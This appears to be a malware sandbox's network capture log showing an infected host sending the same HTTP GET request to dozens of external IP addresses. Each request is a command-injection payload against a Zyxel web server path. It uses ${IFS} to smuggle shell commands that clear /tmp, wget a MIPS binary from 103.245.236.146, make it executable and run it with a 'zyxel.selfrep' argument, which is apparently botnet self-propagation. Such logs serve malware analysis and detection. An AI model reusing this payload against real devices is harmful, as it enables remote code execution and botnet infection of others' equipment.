                                                  Jan 19, 2024 18:24:06.265686035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7016192.168.2.1338290213.72.35.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265736103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7017192.168.2.1338588114.59.250.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265773058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7018192.168.2.1346062161.164.112.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265829086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7019192.168.2.13375081.101.134.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265878916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7020192.168.2.1334468157.10.16.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265894890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7021192.168.2.135836219.161.41.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265949011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7022192.168.2.135545834.104.122.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265981913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7023192.168.2.133863496.244.29.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266036034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7024192.168.2.1338916202.37.225.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266069889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7025192.168.2.134593023.206.202.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266102076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7026192.168.2.134387035.234.94.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266159058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7027192.168.2.133388020.201.215.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266194105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7028192.168.2.133395246.219.64.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266247988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7029192.168.2.133664269.98.22.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266293049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7030192.168.2.1346576164.126.88.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266330004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7031192.168.2.1360420161.161.249.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266349077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7032192.168.2.133521450.236.76.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266380072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7033192.168.2.133553467.42.217.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266412973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7034192.168.2.1352676104.25.150.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266457081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7035192.168.2.133414248.80.13.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266509056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7036192.168.2.1351344150.50.173.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266547918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7037192.168.2.1343456105.190.182.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266570091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7038192.168.2.13495804.128.73.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266604900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7039192.168.2.134799854.47.33.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266635895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7040192.168.2.1356456209.220.249.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266676903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7041192.168.2.1358056133.46.168.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266710997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7042192.168.2.1350490176.173.43.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266742945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7043192.168.2.134915853.202.95.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266793013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7044192.168.2.1351532151.217.136.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266832113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7045192.168.2.1335046176.131.80.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266886950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7046192.168.2.1343970180.82.180.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266936064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7047192.168.2.135896468.222.228.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.266973972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7048192.168.2.133719497.33.234.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267023087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7049192.168.2.1355396137.103.217.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267040014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7050192.168.2.13504401.44.191.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267081022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7051192.168.2.1350522210.191.114.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267148018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7052192.168.2.134518654.86.77.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267175913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7053192.168.2.13470785.225.75.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267201900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7054192.168.2.1351074140.207.105.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267239094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7055192.168.2.134802061.1.145.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267275095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7056192.168.2.1343338134.234.60.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267316103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7057192.168.2.1337110100.177.205.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267359018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7058192.168.2.1340200189.4.144.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267399073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7059192.168.2.135252252.10.199.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267438889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7060192.168.2.135610635.41.149.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267473936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7061192.168.2.1353860111.39.178.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267534971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7062192.168.2.134198698.251.23.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267585993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7063192.168.2.134191274.112.154.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267627001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7064192.168.2.1341746187.13.126.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267667055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7065192.168.2.1347904154.81.45.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267709970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7066192.168.2.1341028160.1.63.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267759085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7067192.168.2.1340548101.112.140.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267800093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7068192.168.2.1356008179.53.68.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267819881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7069192.168.2.1351620130.237.83.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267863989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7070192.168.2.13439584.34.120.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267895937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7071192.168.2.13569664.65.215.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267966032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7072192.168.2.1359738137.253.44.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.267985106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7073192.168.2.1349342164.204.123.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268014908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7074192.168.2.133609069.39.104.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268068075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7075192.168.2.134002236.202.149.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268111944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7076192.168.2.1338142166.194.15.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268167019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7077192.168.2.1346240178.109.163.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268196106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7078192.168.2.1353416131.132.234.249443
                                                  TimestampBytes transferredDirectionData
